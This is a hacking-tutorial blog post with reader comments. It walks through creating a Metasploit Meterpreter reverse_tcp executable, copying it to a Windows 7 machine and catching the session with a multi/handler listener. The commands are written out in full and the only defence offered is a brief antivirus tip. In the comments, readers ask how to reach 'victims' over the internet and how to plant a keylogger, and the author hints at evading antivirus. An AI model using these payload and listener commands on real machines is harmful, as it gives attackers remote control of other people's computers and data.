Create Simple Exploit Using Metasploit to Hack Windows 7
Type : Tutorial
Level : Easy
As I have already wrote on my previous post about how to add a user with administrator rights (you can read the tips and trick here), today I will wrote a simple tutorial to create an exploit for Windows 7 and all Windows.
Everyone love and like the simple way isn’t it? that’s why in my previous tutorial and today tutorial I wrote everything about simple and easy to use 
The tutorial today we will learn how to create a simple exploit (easy to create and easy to implement ) and how we connect to Windows 7 victim that already executed our simple exploit…simple isn’t it?
Okay let’s start the tutorial.
Requirements :
1. Metasploit Framework 2. Windows XP and earlier Windows version (I use Windows 7 SP1)
Step by Step :
FYI in this tutorial I use Backtrack 5 R2 with Metasploit Framework 4.2.0, and my IP address is 192.168.8.91. 1. Open your terminal console and type the following command :
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.91 X > Desktop/v4L.exe
The above command will create Windows executable file with name "v4L.exe" and will be saved on your desktop.
2. Now you need to copy your newly created v4L.exe to your windows 7 system. If you didn’t know how to share your backtrack 5 folder, you can videw the tutorial how to share folder in your Backtrack (view tutorial here).
3. The next step we need to create a handler to handle the connection that came to our Backtrack system from simple exploit we’ve already created before. Open your Metasploit console, see the picture and type the following command : 
Information :
use exploit/multi/handler --> use the metasploit handler set payload windows/meterpreter/reverse_tcp --> we use reverse_tcp (see step 1) set lhost 192.168.8.91 --> set our local IP address that will catch the reverse connection exploit -j -z --> start the handler
4. Now you can try to execute the simple exploit we have already copy to windows 7 and see if our handler receiving something or not. Below was the screenshot of my handler when Windows 7 executed the simple exploit : 
I use sessions -l to listing every sessions that already open there. 5. To interact with the available session, you can use sessions -i <session_id>. From there you can do other command as you want.
Yes we’re inside the Windows 7 now
Countermeasures :
1. Install 3rd party firewall and antivirus that always updated.
Hope it’s useful
FYI : There’s still another tutorial I will post later about Hacking Remote Desktop. You can subscribe to get the tutorial by click the button below and provide your e-mail address :
Incoming search terms:
- how to exploit windows 7
- how to exploit windows 7 using metasploit
- exploit win 7
- exploits for windows 7
- Unable to clone this specific site
- hack win 7 using metasploit
- metasploit for windows 7
- exploit windows 7 with metasploit
- windows 7 vulnerabilities
- how to use metasploit in windows
Written by Vishnu Valentino.
Founder of hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
See all posts by v4L || Visit Website : http://www.vishnuvalentino.com
Popular Posts
15 Responsesto “Create Simple Exploit Using Metasploit to Hack Windows 7”
Trackbacks/Pingbacks
- How To Enable Remote Desktop Using Command Prompt? | Vishnu Valentino Ethical Hacking Tutorial, Security Tips and Trick - [...] How to create a simple exploit for Windows 7 [...]
Leave a Reply
Links
Get Updates via Networkedblogs
hi man… nice post ! please help me how to make it remotly? on win xp its possible?
please send to my email *about Hacking Remote Desktop …thanxs a lot i needy learn to working in security test >X
#hair
yes it’s also possible on win XP
Nice post.. but can you tell me how to do this remotely… I have configured my router for port forwarding but don’t know what to do next..
Thanks
#BlackTrminatr
You need to understand how exploit and payload work. maybe you can give a try to see the simple explanation in this tutorial http://www.hacking-tutorial.com/hacking-tutorial/hacking-into-xp-sp3-via-microsoft-office-excel-ms11_021_xlb_bof-vulnerability/ about lport, lhost; and I think this tutorial clear enough for the basic http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
hey man, awsome blog!
Quick question, wondering whether its possible to add a .exe keylogger after the exploit has occured and place it on the victims computer and somehow click it so it activates
#nathan
Thanks!
you can view here http://www.hacking-tutorial.com/hacking-tutorial/create-exploit-using-msfvenom-to-hack-windows-7-sp1/
Hey man i just creatd an account in 000webhost..free web hosting site..nd der i redirect my own website url to google.com..bt nw wat i have to do i’m nt getting to hack wan computer..i knw i have to create a payload and listener bt wat bout server..plz help me..
#Prakash
if you host, then you’ll hack using web app; if you want to hack a victim PC’s, then you need to buy your own dedicated backtrack server or you can view the tutorial here http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
Gimme steps using web app..i got stuck..
I am using dongle with dynamic IP. I am using host name from no-ip.com to redirect my dynamic IP address. so I typed this to create .exe file:
“”"msfpayload windows/meterpreter/reverse_tcp LHOST=myhostname.zapto.org X > Desktop/v4l.exe”"”
and then I set up the handler and payload and set the lhost:
“”"set lhost myhostname.zapto.org”"”
but when I execute exploit command there’s an error:
“”"Handler failed to bind to 180.214.233.37:4444″”"
ps: 180.214.233.37 is my current dynamic global IP address
what should I do? help me plz….
I am able to use msf on virtual LAN. thanks for your tutorials. but I want to do it over internet, FYI I don’t have router, I only have a computer and a dongle. Do you have any idea on error message I have shown you above? oh ya inspite of error, I try to execute the .exe on my friends computer. but there is no session appear on server machine.
any help would be really appreciated. THANKS
lets say i will be able to get the file on the victims computer how can i use this if the target is on an external location?
#gabeapp
http://www.hacking-tutorial.com/hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/
Hi my friend, i'd like to thank you for this post, and i also appreciate your easy way of explainiing things. However, what's the usefulness of this tutorial since it can NEVER bypass any security measures, and why do you specify this attack to windows 7?? this exe meterpreter can be used on any microsoft system, ONLY of firewalls & antiviruses are disabled
#shinobi
you didn’t feel the usefulness because you want the fast and easy way
with all of this you also can build a new one without caught by antivirus, but of course for all of it you need an effort to learn more after you know the basic.